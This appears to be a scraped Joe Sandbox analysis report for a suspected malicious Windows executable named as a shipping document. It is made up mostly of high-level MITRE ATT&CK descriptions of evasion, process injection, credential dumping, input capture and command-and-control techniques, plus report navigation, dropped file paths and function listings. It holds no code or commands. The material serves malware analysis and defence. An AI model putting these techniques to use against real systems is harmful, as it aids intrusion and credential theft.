Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report shipping doc_20241111.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\1453h-8L

C:\Users\user\AppData\Local\Temp\spiketop

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
shipping doc_20241111.exe

Function 00F4615E Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00F4445D Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00F46122 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00F446FF Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00F805FC Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00F4533E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00F445AE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00F44B9B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 015AA958 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00F4468E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 015AA6F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156
fileCOMMON

Function 00F459A7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 015A95E8 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00F457AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre